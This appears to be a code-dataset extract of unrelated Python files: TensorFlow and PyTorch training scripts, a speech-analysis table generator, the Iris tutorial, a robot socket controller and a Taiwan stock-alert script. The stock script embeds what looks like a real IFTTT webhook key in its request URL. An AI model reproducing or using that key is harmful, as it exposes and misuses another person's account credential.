index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
991,100 | 064366008192b23393525520a650a8d281a76419 | import tensorflow as tf
import pandas as pd
import numpy as np
import os
def train(filename):
y = tf.placeholder(tf.float32, [None, 10])
traindata = pd.read_csv(filename).values
imagedata = traindata[:, 1:]
imagedata = imagedata.astype(np.float)
imagedata = np.multiply(imagedata, 1.0 / 255)
verifyimg = imagedata[40000:, :]
imagedata = imagedata[0:40000, :]
labeldata = traindata[:, 0]
verifylab = labeldata[40000:]
labeldata = labeldata[0:40000]
onehotlabel = [[0 for i in range(10)] for i in range(len(labeldata))]
for i in range(len(labeldata)):
onehotlabel[i][labeldata[i]] = 1
onehotlabel = np.array(onehotlabel, dtype=np.uint8)
batchsize = 100
globalstep = tf.Variable(0, trainable=False)
varave = tf.train.ExponentialMovingAverage(0.99, globalstep)
varaveop = varave.apply(tf.trainable_variables())
crossentrogymean = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=lenet5y))
loss = crossentrogymean + tf.add_n(tf.get_collection('loss'))
learnrate = tf.train.exponential_decay(0.01, globalstep, 160000, 0.99)
#trainop = tf.train.GradientDescentOptimizer(learnrate).minimize(loss, global_step=globalstep)
trainstep = tf.train.GradientDescentOptimizer(learnrate).minimize(loss, global_step=globalstep)
#trainstep = tf.train.AdadeltaOptimizer(0.01).minimize(loss, global_step=globalstep)
#trainstep = tf.train.AdamOptimizer(0.01).minimize(loss, global_step=globalstep)
trainop = tf.group(trainstep, varaveop)
saver = tf.train.Saver(max_to_keep=400)
label = [[0 for i in range(10)] for i in range(len(verifylab))]
for i in range(len(verifylab)):
label[i][verifylab[i]] = 1
label = np.array(label, dtype=np.uint8)
correctpredict = tf.equal(tf.argmax(lenet5y, 1), tf.argmax(y, 1))
accuracy = tf.reduce_mean(tf.cast(correctpredict, tf.float32))
with tf.Session() as sess:
writer = tf.summary.FileWriter("/ckpt/", sess.graph)
max = 0.0
maxi = 0
ckpt = tf.train.get_checkpoint_state('/ckpt/')
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
else:
tf.global_variables_initializer().run()
for i in range(400):
for j in range(400):
x1 = imagedata[j * batchsize:(j + 1) * batchsize]
x1 = np.reshape(x1, (100, 28, 28, 1))
y1 = onehotlabel[j * batchsize:(j + 1) * batchsize]
_, lossval, step = sess.run([trainop, loss, globalstep], feed_dict={x: x1, y: y1, droprate: 0.5})
saver.save(sess, '/ckpt/lenet5'+str(i)+'.ckpt')
verifyimg = np.reshape(verifyimg, (2000, 28, 28, 1))
accuracyrate = sess.run(accuracy, feed_dict={x: verifyimg, y: label, droprate: 1.0})
if accuracyrate > max:
max = accuracyrate
maxi = i
print(str(accuracyrate)+str(i))
print(str(max))
print(str(maxi))
# saver.save(sess, '/ckpt/lenet5.ckpt')
# with tf.Session() as sess:
# ckpt = tf.train.get_checkpoint_state('/ckpt/')
# if ckpt and ckpt.model_checkpoint_path:
# saver.restore(sess, ckpt.model_checkpoint_path)
# verifyimg = np.reshape(verifyimg, (2000, 28, 28, 1))
# accuracyrate = sess.run(accuracy, feed_dict={x: verifyimg, y: label})
# print(str(accuracyrate))
tf.reset_default_graph()
def datatest(filename):
testdata = pd.read_csv(filename).values
imagedata = testdata.astype(np.float)
imagedata = np.multiply(imagedata, 1.0 / 255)
y = tf.nn.softmax(lenet5y)
saver = tf.train.Saver()
yout = tf.arg_max(y, 1)
with tf.Session() as sess:
saver.restore(sess, '/ckpt/lenet5220.ckpt')
n = int(len(imagedata) / 1000)
data = [0] * len(imagedata)
k = 0
for i in range(n):
x1 = imagedata[i * 1000:(i + 1) * 1000]
x1 = np.reshape(x1, (1000, 28, 28, 1))
result = sess.run(yout, feed_dict={x: x1, droprate: 1.0})
for j in range(1000):
data[k] = result[j]
k += 1
index = list(range(1, len(data) + 1))
pd.DataFrame(data=data, index=index, columns=['Label']).to_csv('result.csv')
tf.reset_default_graph()
if not os.path.exists('/ckpt/'):
os.mkdir('/ckpt/')
x = tf.placeholder(tf.float32, [None, 28, 28, 1])
droprate = tf.placeholder(tf.float32)
inputdata = tf.reshape(x, [-1, 28, 28, 1])
conv1w = tf.Variable(tf.truncated_normal([3, 3, 1, 32], stddev=0.1))
conv1b = tf.Variable(tf.constant(0.1, shape=[32]))
conv1 = tf.nn.conv2d(inputdata, conv1w, strides=[1, 1, 1, 1], padding='SAME')
relu1 = tf.nn.relu(tf.nn.bias_add(conv1, conv1b))
pool1 = tf.nn.max_pool(relu1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
conv2w = tf.Variable(tf.truncated_normal([5, 5, 32, 64], stddev=0.1))
conv2b = tf.Variable(tf.constant(0.1, shape=[64]))
conv2 = tf.nn.conv2d(pool1, conv2w, strides=[1, 1, 1, 1], padding='SAME')
relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2b))
pool2 = tf.nn.max_pool(relu2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
conv3w = tf.Variable(tf.truncated_normal([5, 5, 64, 128], stddev=0.1))
conv3b = tf.Variable(tf.constant(0.1, shape=[128]))
conv3 = tf.nn.conv2d(pool2, conv3w, strides=[1, 1, 1, 1], padding='SAME')
relu3 = tf.nn.relu(tf.nn.bias_add(conv3, conv3b))
pool3 = tf.nn.max_pool(relu3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
poolshape = pool3.get_shape().as_list()
nodes = poolshape[1] * poolshape[2] * poolshape[3]
reshaped = tf.reshape(pool3, [-1, nodes])
fc1w = tf.Variable(tf.truncated_normal([nodes, 1024], stddev=0.1))
tf.add_to_collection('loss', tf.contrib.layers.l2_regularizer(0.0001)(fc1w))
fc1b = tf.Variable(tf.constant(0.1, shape=[1024]))
fc1 = tf.nn.relu(tf.matmul(reshaped, fc1w) + fc1b)
fc1 = tf.nn.dropout(fc1, droprate)
fc2w = tf.Variable(tf.truncated_normal([1024, 10], stddev=0.1))
tf.add_to_collection('loss', tf.contrib.layers.l2_regularizer(0.0001)(fc2w))
fc2b = tf.Variable(tf.constant(0.1, shape=[10]))
lenet5y = tf.matmul(fc1, fc2w) + fc2b
inputstr = input('请输入命令:\n')
while 1:
if inputstr == 'exit':
exit()
inputstr = inputstr.strip().split()
if len(inputstr) != 2:
inputstr = input('非法命令!请重新输入命令:\n')
continue
if inputstr[0] == 'train':
train(inputstr[1])
if inputstr[0] == 'test':
datatest(inputstr[1])
inputstr = input('请输入命令:\n')
tf.reset_default_graph()
|
991,101 | 2959600e7e42ec212b4823afa144660fd07ebc3e | from torch.utils.data.dataset import Dataset
from data.image_folder import make_dataset
import os
from PIL import Image
from glob import glob as glob
import numpy as np
import random
import torch
class RegularDataset(Dataset):
def __init__(self, opt, augment):
self.opt = opt
self.root = opt.dataroot
self.transforms = augment
# input A (label maps source)
dir_A = '_label'
self.dir_A = os.path.join(opt.dataroot, opt.phase + dir_A)
self.A_paths = sorted(make_dataset(self.dir_A))
# input B (label images target)
dir_B = '_label'
self.dir_B = os.path.join(opt.dataroot, opt.phase + dir_B)
self.B_paths = sorted(make_dataset(self.dir_B))
# densepose maps
self.dir_densepose = os.path.join(
opt.dataroot, opt.phase + '_densepose')
self.densepose_paths = sorted(glob(self.dir_densepose + '/*'))
self.dataset_size = len(self.A_paths)
def custom_transform(self, input_image, per_channel_transform):
manualSeed = random.randint(1, 10000)
random.seed(manualSeed)
torch.manual_seed(manualSeed)
if per_channel_transform:
num_channel_image = input_image.shape[0]
tform_input_image_np = np.zeros(
shape=input_image.shape, dtype=input_image.dtype)
for i in range(num_channel_image):
# TODO check why i!=5 makes a big difference in the output
if i != 1 and i != 2 and i != 4 and i != 5 and i != 13:
# if i != 0 and i != 1 and i != 2 and i != 4 and i != 13:
tform_input_image_np[i] = self.transforms['1'](
input_image[i])
else:
tform_input_image_np[i] = self.transforms['2'](
input_image[i])
return torch.from_numpy(tform_input_image_np)
def __getitem__(self, index):
# input A (label maps source)
A_path = self.A_paths[index]
A = self.parsing_embedding(A_path, 'seg') # channel(20), H, W
# input B (label maps target)
B_path = self.B_paths[index]
B = self.parsing_embedding(B_path, 'seg') # channel(20), H, W
# densepose maps
dense_path = self.densepose_paths[index]
dense_img = np.asarray((np.uint8(np.load(dense_path,allow_pickle=True))))
#dense_img = np.load(dense_path, allow_pickle=True).astype('uint8')
dense_img_parts_embeddings = self.parsing_embedding(
dense_img[:, :, 0], 'densemap')
dense_img_parts_embeddings = np.transpose(
dense_img_parts_embeddings, axes=(1, 2, 0))
dense_img_final = np.concatenate(
(dense_img_parts_embeddings, dense_img[:, :, 1:]), axis=-1) # channel(27), H, W
# original seg mask
seg_mask = Image.open(A_path)
seg_mask = np.array(seg_mask)
seg_mask = torch.tensor(seg_mask, dtype=torch.long)
# final returns
A_tensor = self.custom_transform(A, True)
B_tensor = torch.from_numpy(B)
print("dense_img_final start lllllllllll",dense_img_final.shape,"end lllllllllllllllllllllll")
print("segmask staarttttttttttttt",seg_mask.shape,"endoooooooooo")
dense_img_final = torch.from_numpy(
np.transpose(dense_img_final, axes=(2, 0, 1)))
input_dict = {'seg_map': A_tensor, 'dense_map': dense_img_final, 'target': B_tensor, 'seg_map_path': A_path,
'target_path': A_path, 'densepose_path': dense_path, 'seg_mask': seg_mask}
return input_dict
def parsing_embedding(self, parse_obj, parse_type):
if parse_type == "seg":
parse = Image.open(parse_obj)
parse = np.array(parse)
parse_channel = 20
elif parse_type == "densemap":
parse = np.array(parse_obj)
parse_channel = 25
parse_emb = []
for i in range(parse_channel):
parse_emb.append((parse == i).astype(np.float32).tolist())
parse = np.array(parse_emb).astype(np.float32)
return parse
def __len__(self):
return len(self.A_paths) // self.opt.batchSize * self.opt.batchSize
def name(self):
return 'RegularDataset'
|
991,102 | 34381db099044011cf4d43f4cfa374b4420d624c | import parselmouth # https://parselmouth.readthedocs.io/en/stable/
from utils.syllabe_nuclei import speech_rate
from pathlib import Path
import os
import numpy as np
import json
path = Path("static/sounds/")
info_dict = {}
for file in os.listdir(path):
if file.startswith("0") or file[0].isupper():
print(file)
snd = parselmouth.Sound(str(path / file))
data = speech_rate(snd)
intensity = snd.to_intensity().values.T
pitch = snd.to_pitch()
pitch = pitch.selected_array["frequency"]
data["intensity mean"] = np.mean(intensity)
data["intensity std"] = np.std(intensity)
data["pitch mean"] = np.mean(pitch)
data["pitch std"] = np.std(pitch)
info_dict[file] = data
compare_dict = {}
# Con 0 y _ es Despues, solo nombre antes
for key in info_dict.keys():
key_s = key.split("_")
if len(key_s) > 1:
compare_dict[key_s[0]] = {}
compare_dict[key_s[0]]["AFTER"] = info_dict[key]
compare_dict[key_s[0]]["BEFORE"] = info_dict[key_s[1]]
with open("compare_dict.json", "w") as outfile:
json.dump(compare_dict, outfile)
with open("compare_dict.json", "r") as outfile:
compare_dict = json.load(outfile)
table_latex = """
\subsubsection{{Student number {file}}}
\\begin{{table}}[H]
\centering
\\begin{{tabular}}{{|l|r|r|}}
\hline
&Before course &After course \\\\
\hline
Mean intensity &{before_mean_intensity} &{after_mean_intensity} \\\\
\hline
Std intensity &{before_std_intensity} &{after_std_intensity} \\\\
\hline
Mean pitch(Hz) &{before_mean_pitch} &{after_mean_pitch} \\\\
\hline
Std pitch(Hz) &{before_std_pitch} &{after_std_pitch} \\\\
\hline
Duration &{before_duration} &{after_duration} \\\\
\hline
Number of pauses per minute &{before_pauses} &{after_pauses} \\\\
\hline
Speech rate (syllabus/duration) &{before_srate} &{after_srate} \\\\
\hline
ASD(speakingtime / nsyll) &{before_asd} &{after_asd} \\\\
\hline
\end{{tabular}}
\caption{{Student number {file}}}
\label{{tab:{file}_table}}
\end{{table}}
"""
# "nsyll"
# "npause"
# "dur(s)"
# "phonationtime(s)"
# "speechrate(nsyll / dur)"
# "articulation rate(nsyll / phonationtime)"
# "ASD(speakingtime / nsyll)"
file_object = open("tables.txt", "a")
for k, v in compare_dict.items():
before: dict = v.get("BEFORE")
after: dict = v.get("AFTER")
pauses_after = after.get("npause") / (after.get("dur(s)") / 60)
pauses_before = before.get("npause") / (before.get("dur(s)") / 60)
table_formatted = table_latex.format(
file=k,
before_mean_intensity=round(before.get("intensity mean"), 2),
after_mean_intensity=round(after.get("intensity mean"), 2),
before_std_intensity=round(before.get("intensity std"), 2),
after_std_intensity=round(after.get("intensity std"), 2),
before_mean_pitch=round(before.get("pitch mean"), 2),
after_mean_pitch=round(after.get("pitch mean"), 2),
before_std_pitch=round(before.get("pitch std"), 2),
after_std_pitch=round(after.get("pitch std"), 2),
before_duration=round(before.get("dur(s)"), 2),
after_duration=round(after.get("dur(s)"), 2),
before_phonation=round(before.get("phonationtime(s)"), 2),
after_phonation=round(after.get("phonationtime(s)"), 2),
before_pauses=round(pauses_before, 2),
after_pauses=round(pauses_after, 2),
before_srate=round(before.get("speechrate(nsyll / dur)"), 2),
after_srate=round(after.get("speechrate(nsyll / dur)"), 2),
before_arate=round(before.get("articulation rate(nsyll / phonationtime)"), 2),
after_arate=round(after.get("articulation rate(nsyll / phonationtime)"), 2),
before_asd=round(before.get("ASD(speakingtime / nsyll)"), 2),
after_asd=round(after.get("ASD(speakingtime / nsyll)"), 2),
)
file_object.write(table_formatted)
|
991,103 | 2930af02ce8cf5ad4186bd9a6724374a365072d6 | import ocdskingfisher.util
from tests.base import BaseTest
class TestDataBase(BaseTest):
def test_create_tables(self):
self.setup_main_database()
class TestUtil(BaseTest):
def test_database_get_hash_md5_for_data(self):
assert ocdskingfisher.util.get_hash_md5_for_data({'cats': 'many'}) == '538dd075f4a37d77be84c683b711d644'
def test_database_get_hash_md5_for_data2(self):
assert ocdskingfisher.util.get_hash_md5_for_data({'cats': 'none'}) == '562c5f4221c75c8f08da103cc10c4e4c'
class TestControlCodes(BaseTest):
def test_control_code_to_filter_out_to_human_readable(self):
for control_code_to_filter_out in ocdskingfisher.util.control_codes_to_filter_out:
# This test just calls it and make sure it runs without crashing
# (some code was crashing, so wanted test to check all future values of control_codes_to_filter_out)
print(ocdskingfisher.util.control_code_to_filter_out_to_human_readable(control_code_to_filter_out))
|
991,104 | 9ef2d58351e41decc892bc85af74304cec6660b9 | """
Introduction to the high-level contrib-learn API of TensorFlow using the Iris dataset.
Will Long
June 12, 2017
"""
import os
from urllib.request import urlopen
import tensorflow as tf
import numpy as np
IRIS_DIRECTORY = "iris_data/"
IRIS_TRAINING = "iris_training.csv"
IRIS_TRAINING_URL = "http://download.tensorflow.org/data/iris_training.csv"
IRIS_TEST = "iris_test.csv"
IRIS_TEST_URL = "http://download.tensorflow.org/data/iris_test.csv"
if not os.path.exists(IRIS_DIRECTORY):
os.makedirs(IRIS_DIRECTORY)
if not os.path.exists(IRIS_DIRECTORY + IRIS_TRAINING):
raw = urlopen(IRIS_TRAINING_URL).read()
with open(IRIS_DIRECTORY + IRIS_TRAINING, 'wb') as f:
f.write(raw)
if not os.path.exists(IRIS_DIRECTORY + IRIS_TEST):
raw = urlopen(IRIS_TEST_URL).read()
with open(IRIS_DIRECTORY + IRIS_TEST, 'wb') as f:
f.write(raw)
# Load data sets
training_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=IRIS_DIRECTORY + IRIS_TRAINING,
target_dtype=np.int,
features_dtype=np.float32)
test_set = tf.contrib.learn.datasets.base.load_csv_with_header(
filename=IRIS_DIRECTORY + IRIS_TEST,
target_dtype=np.int,
features_dtype=np.float32)
# Specify that all features have real-value data
feature_columns = [tf.contrib.layers.real_valued_column("", dimension=4)]
# Build 3 layer DNN with 10, 20, 10 units respectively.
classifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns,
hidden_units=[10, 20, 10],
n_classes=3,
model_dir="/tmp/iris_model")
# Define the test inputs
def get_train_inputs():
x = tf.constant(training_set.data)
y = tf.constant(training_set.target)
return x, y
# Fit model.
classifier.fit(input_fn=get_train_inputs, steps=2000)
# Define the test inputs
def get_test_inputs():
x = tf.constant(test_set.data)
y = tf.constant(test_set.target)
return x, y
# Evaluate accuracy.
accuracy_score = classifier.evaluate(input_fn=get_test_inputs,
steps=1)["accuracy"]
print("\nTest Accuracy: {0:f}\n".format(accuracy_score))
# Classify two new flower samples.
def new_samples():
return np.array(
[[6.4, 3.2, 4.5, 1.5],
[5.8, 3.1, 5.0, 1.7]], dtype=np.float32)
predictions = list(classifier.predict(input_fn=new_samples))
print("New Samples, Class Predictions: {}\n".format(predictions))
|
991,105 | c542b1c14705ee700506c46b519dd58b429a21c4 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 5 15:29:40 2020
@author: YANGS
"""
import twstock
import requests
import time
def get_setting():
try:
res=[]
with open("stock.txt") as f:
lists=f.readlines()
print("讀入資料:",lists)
for lst in lists:
s=lst.split(',')
res.append([s[0],float(s[1]),float(s[2])])
except:
print("讀取資料有誤")
return(res)
def get_price(stockid):
rt=twstock.realtime.get(stockid)
if rt['success']:
return (rt['info']['name'],float(rt['realtime']['latest_trade_price']))
else:
return(False,False)
def get_best(stockid):
stock=twstock.Stock(stockid)
bp=twstock.BestFourPoint(stock).best_four_point()
if(bp):
return ('買進' if bp[0] else '賣出',bp[1])
else:
return(False,False)
def send_ifttt(v1,v2,v3):
url='https://maker.ifttt.com/trigger/toline/with/key/1WjdQ89uBOKzhnQYsDtLg'+'?value1='+str(v1)+'&value2='+str(v2)+'&value3='+str(v3)
r=requests.get(url)
if r.text[:4]=="Cong":
print("Success")
return r.text
stocklist=get_setting()
cnt=len(stocklist)
log1=[]
log2=[]
for i in range(cnt):
log1.append('')
log2.append('')
check_cnt=20
while True:
for i in range(cnt): #0,1,2 共3支股票
id,low,high=stocklist[i] #id會度給下一個函數找出價格
name,price=get_price(id)
print("檢查:",name,"股價:",price,"區間:",low,"~",high)
if price <= low:
if log1[i] != '買進':
send_ifttt(name,price,'買進(股價低於'+str(low))
log1[i]='買進'
elif price >= high:
if log1[i] != '賣出':
send_ifttt(name,price,'賣出(股價高於'+str(high))
log1[i] ='賣出'
act,why=get_best(id)
if why:
if log2[i] != why:
send_ifttt(name,price,act+why)
log2[i] = why
print("-----------------------")
check_cnt -=1
if check_cnt == 0:
break
time.sleep(180)
|
991,106 | af359a0152a22fd0f70ecd95bda992144d134cfe | '''Generates make file to generate the different plots
'''
from bact2.applib.bba import commons
from bact2.applib.transverse_lib.plots_makefile import main_func
def main():
pickle_file_name = commons.pickle_file_name()
main_func(makefile_name=commons.makefile_name(),
pickle_file_name=pickle_file_name,
column_with_kicker_name='mux_selector_selected',
app_dir='bba',
plots_dir='plots_bba')
if __name__ == '__main__':
main()
|
991,107 | 1c72c3eb62e85e50ec4c3beb7f7037307dc3a78d | """ Crie um programa que leia o nome completo de uma pessoa e mostre:
- O nome com todas as letras maiúsculas e minúsculas.
- Quantas letras ao todo (sem considerar espaços).
- Quantas letras tem o primeiro nome. """
name = str(input('Digite seu nome completo: ')).strip()
nameUpper = name.upper()
nameMin = name.lower()
nameLen = len(name) - name.count(' ')
nameFirst = name.split()[0]
nameFirstLen = len(nameFirst)
print('Analisando seu nome...')
print('Seu nome em maiúsculoas é {}.'.format(nameUpper))
print('Seu nome em minúsculas é {}.'.format(nameMin))
print('Seu nome tem ao todo {} letras.'.format(nameLen))
print('Seu primeiro nome é {} e ele tem {} letras.'.format(nameFirst, nameFirstLen))
|
991,108 | 30a7b68e119b3be7df6d697f6f88665f8214708c | import socket
import time
import numpy as np
import struct
import atexit
class PushBot2(object):
def __init__(self, address, port=56000, message_delay=0.01):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((address, port))
self.socket.settimeout(0)
self.message_delay = message_delay
self.last_time = {}
self.motor(0, 0, force=True)
self.socket.send('E+\n')
self.socket.send('!M+\n')
atexit.register(self.stop)
self.ticks = 0
self.vertex = None
def send(self, key, cmd, force):
now = time.time()
if force or self.last_time.get(key, None) is None or (now >
self.last_time[key]+self.message_delay):
self.socket.send(cmd)
#print cmd
self.last_time[key] = now
def motor(self, left, right, force=False):
left = int(left*100)
right = int(right*100)
if left > 100: left=100
if left < -100: left=-100
if right > 100: right=100
if right < -100: right=-100
cmd = '!MVD0=%d\n!MVD1=%d\n' % (left, right)
self.send('motor', cmd, force)
def beep(self, freq, force=False):
if freq <= 0:
cmd = '!PB=0\n!PB0=0\n'
else:
cmd = '!PB=%d\n!PB0=%%50\n' % int(1000000/freq)
self.send('beep', cmd, force)
def laser(self, freq, force=False):
if freq <= 0:
cmd = '!PA=0\n!PA0=0\n'
else:
cmd = '!PA=%d\n!PA0=%d\n' % (int(1000000/freq), int(500000/freq))
self.send('laser', cmd, force)
def led(self, freq, force=False):
if freq <= 0:
cmd = '!PC=0\n!PC0=0\n!PC1=0'
else:
cmd = '!PC=%d\n!PC0=%%50\n!PC1=%%50' % int(1000000/freq)
self.send('led', cmd, force)
def stop(self):
if self.socket is not None:
self.beep(0, force=True)
#self.laser(0, force=True)
#self.led(0, force=True)
self.socket.send('!M-\n')
self.socket.send('E-\n')
#self.send_motor(0, 0, force=True)
|
991,109 | 890b869985f73ea270eb16721122911bfd1af3c5 | s=input()
l=int(input())
x=''
for i in range(len(s)):
if i%l==0:
x+=s[i]
print(x)
|
991,110 | 1bdc0edc387f7b786bbc6a4d6c40cbfb1226000c | # 3-05. 영상의 명암비 조절 (2)
import sys
import numpy as np
import cv2
src = cv2.imread('ref/Hawkes.jpg', cv2.IMREAD_GRAYSCALE)
if src is None:
print('Image load failed!')
sys.exit()
dst = cv2.normalize(src, None, 0, 255, cv2.NORM_MINMAX)
# 입력영상 src, 결과 dst None(무시), 알파(최소값) 0, 베타(최대값) 255, NORM_TYPE은 MINMAX(최소 최대값)
gmin = np.min(src)
gmax = np.max(src)
# 실수형태 계산을 위해 255.
# dst = np.clip((src - gmin) * 255. / (gmax - gmin), 0, 255).astype(np.uint8)
cv2.imshow('src', src)
cv2.imshow('dst', dst)
cv2.waitKey()
cv2.destroyAllWindows()
|
991,111 | 71cd9991bc92df19d030f95a52d7b1e1c1999c8a | import os
from pathlib import Path
# from doc_name import functuon
from FindLinks import findLinks, __make_soup
from CrawlParsedData import crawlLink
from Types import CountryName, EventTopic
countryList = [CountryName("United States", "united-states")]
topicInfoList = [EventTopic("ai", 2), EventTopic("technology", 2)]
### Step 1: find all links by going over [countryList] and [topicInfoList]
### and crawl each link
for country in countryList:
for topic in topicInfoList:
findLinks(topic, country)
crawlLink(topic, country)
### Step 2: tokenize the parsed results and stem
|
991,112 | 84c692400092327be8d677f99f3e4be977c1f2a3 | # https://leetcode.com/problems/split-a-string-in-balanced-strings/submissions/
class Solution:
def balancedStringSplit(self, s: str) -> int:
L = 0
R = 0
output = 0
for i in s:
if i == "L":
L = L + 1
if i == "R":
R = R + 1
if R == L:
L = 0
R = 0
output = output + 1
return output |
991,113 | 2623b9374952761b056a470bb28cb453cd5c9c28 | # coding=utf-8
from __future__ import unicode_literals
import datetime
from selenium.webdriver import ActionChains
import time
import random
from helpers.waits import wait_until_extjs
class Plan(object):
def __init__(self, driver):
self.driver = driver
"""
@type driver: WebDriver
"""
self.title = 'plan_title_%s' % str(int(round(time.time() * 1000)))
self.description = 'cool description'
self.calendar = None
self.task = None
self.template = None
self.date = (datetime.datetime.now() + datetime.timedelta(days=1)).strftime('%d.%m.%Y')
self.time = '18:00'
self.modified = False
self.form = None
self.changed_task = None
"""
@type changed_task: ChangedTask
"""
def set_form(self, plan_form):
self.form = plan_form
def fill_form(self):
self.fill_title_and_description()
self.fill_date()
if not self.modified:
self.fill_time()
self.click_create_plan_btn()
else:
self.click_save_btn()
def fill_title_and_description(self):
plan_form = self.form
title_field = plan_form.find_element_by_css_selector('input[name=Title]')
title_field.clear()
title_field.send_keys(self.title)
description_field = plan_form.find_element_by_css_selector('textarea[name=Description]')
description_field.clear()
description_field.send_keys(self.description)
def fill_date(self):
plan_form = self.form
plan_form.find_element_by_xpath("//table[contains(@id,'datefield')]//div[@role='button']").click()
date = self.date.split('.')[0].lstrip('0')
plan_form.find_element_by_xpath(
"//td[not(contains(@class, 'disabled'))]/a[@class='x-datepicker-date'][.='%s']" % date).click()
def fill_time(self):
wait_until_extjs(self.driver, 10)
plan_form = self.form
plan_form.find_element_by_xpath("//input[contains(@id,'timefield')]").send_keys(self.time)
def click_create_plan_btn(self):
self.form.find_element_by_xpath("//span[.='Создать']/ancestor::a").click()
wait_until_extjs(self.driver, 10)
def click_save_btn(self):
self.form.find_element_by_xpath("//span[.='Сохранить']/ancestor::a[contains(@class, 'accent-button')]").click()
wait_until_extjs(self.driver, 10)
def get_calendar_and_task(self):
plan_form = self.form
plan_form.find_element_by_xpath("//input[@name='CalendarId']/ancestor::tr//div[@role='button']").click()
wait_until_extjs(self.driver, 10)
time.sleep(1)
calendar_list = self.driver.find_elements_by_xpath("//li[@class='x-boundlist-item']")
calendar = random.choice(calendar_list)
self.calendar = calendar.get_attribute('innerHTML')
ActionChains(self.driver).click(calendar).click(plan_form).perform()
wait_until_extjs(self.driver, 10)
self.get_task(plan_form)
def get_task(self, plan_form):
task_input_name = 'AssociatedTaskId' if 'EditPlan' not in self.driver.current_url else 'LinkTaskId'
plan_form.find_element_by_xpath(
"//input[@name='%s']/ancestor::tr//div[@role='button']" % task_input_name).click()
time.sleep(2)
task_list = self.driver.find_elements_by_xpath("//li[@class='x-boundlist-item']")
task_list = [t for t in task_list if ':' in t.text]
task = random.choice(task_list[:5])
self.task = task.get_attribute('innerHTML')
ActionChains(self.driver).click(task).click(plan_form).perform()
wait_until_extjs(self.driver, 10)
def get_template_and_task(self):
plan_form = self.form
plan_form.find_element_by_xpath("//input[@name='ParentPlanId']/ancestor::tr//div[@role='button']").click()
wait_until_extjs(self.driver, 10)
time.sleep(1)
template_list = self.driver.find_elements_by_xpath("//li[@class='x-boundlist-item']")
template = random.choice(template_list)
self.template = template.get_attribute('innerHTML')
ActionChains(self.driver).click(template).click(plan_form).perform()
wait_until_extjs(self.driver, 10)
self.get_task(plan_form)
def modify(self):
self.title, self.description = map(lambda x: '_'.join([x, 'edited']), [self.title, self.description])
self.date = (datetime.datetime.now() + datetime.timedelta(days=2)).strftime('%d.%m.%Y')
self.modified = True
def __str__(self):
return str(self.__dict__) |
991,114 | e1c138ea539dc8364f62286c7a438d1e4d3efd10 | #!/usr/bin/env python
from math import sqrt
class Problem7(object):
def prime(self, element):
prime_counter = 0
number_to_test = 1
while prime_counter < element:
number_to_test += 1
if self.is_prime(number_to_test):
prime_counter += 1
return number_to_test
def is_prime(self, number):
for possible_divider in xrange(2, int(sqrt(number)) + 1):
if number % possible_divider == 0:
return False
return True
if __name__ == '__main__':
problem7 = Problem7()
print problem7.prime(10001) # == 104743 |
991,115 | 0cc46b1e92b934bd8cebd9e8639ce963be82beb4 | """
Created on Mon Dec 3 18:52:44 2018
@author: simon
Project: FuturaeNetcom/4chan
"""
import ModelTraining
import Scraping
# main part of the programm
def main(bool_scraping):
if (bool_scraping):
scraping()
else:
learning()
return
# starts using ModelTraining.py
def learning():
ModelTraining.start('data/scraped_material-a-1543749875.txt',
None,
'floyd',
'Start',
100)
return
# starts using Scraping.py
def scraping():
Scraping.main(['a', 'v'])
return
main()
|
991,116 | 33a48df20f610aab7660715a269310ca94ffc867 | import matplotlib
import os
from os import path
from os.path import isfile,join
import random
import torch
import torchvision
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.insert(1, '../utils')
sys.path.insert(1, '../datasets')
sys.path.insert(1, '../search')
import my_datasets as mdset
import utils as U
from matplotlib import colors
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
import argparse
from argparse import ArgumentParser
from PIL import Image
# CONSTANTS
### TYPE
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def infere_and_save(model,save_dir,list_iter,test_dataset_no_norm,test_dataset,device,cpt):
CMAP = U.get_cmap_landcover()
for i in list_iter:
path_save = join(save_dir,str(i))
path_exist = path.isdir(path_save)
if not path_exist: # Create Dir if not exists and save image and mask
os.mkdir(path_save)
im,m = test_dataset_no_norm.__getitem__(i)
im.transpose_(0,2)
im.transpose_(0,1)
im = im.numpy()
m = m.numpy()
im = im*255
im = im.astype(np.uint8)
im = Image.fromarray(im)
m = Image.fromarray(m)
im = im.convert("RGB")
m = m.convert("L")
m.save(join(path_save,'gt.png'))
im.save(join(path_save,'image.png'))
im,m = test_dataset.__getitem__(i)
x = im.unsqueeze(0).to(device)
pred = model(x)
pred = pred['out']
pred = pred.argmax(dim=1).squeeze().cpu()
fig = plt.figure()
plt.imshow(pred,cmap=CMAP,vmin=0,vmax=3,interpolation='nearest')
plt.savefig(join(path_save,'pred'+str(cpt)+'.png'))
def main():
#torch.manual_seed(42)
# ------------
# args
# ------------
parser = ArgumentParser()
parser.add_argument('--gpu', default=0, type=int,help="Device")
args = parser.parse_args()
# ------------
# device
# ------------
device = torch.device("cuda:"+str(args.gpu) if torch.cuda.is_available() else "cpu")
print("device used:",device)
# ------------
# model
# ------------
N_CLASSES = 4
# Save_dir
save_dir = '/share/homes/karmimy/equiv/save_model/landcover_visu'
# ------------
# dataset and dataloader
# ------------
dataroot_landcover = '/share/DEEPLEARNING/datasets/landcover'
bs = 1
num_classes = 4
pm = True
nw = 4
print('Loading Landscape Dataset')
test_dataset = mdset.LandscapeDataset(dataroot_landcover,image_set="test")
test_dataset_no_norm = mdset.LandscapeDataset(dataroot_landcover,image_set="test",normalize=False)
print('Success load Landscape Dataset')
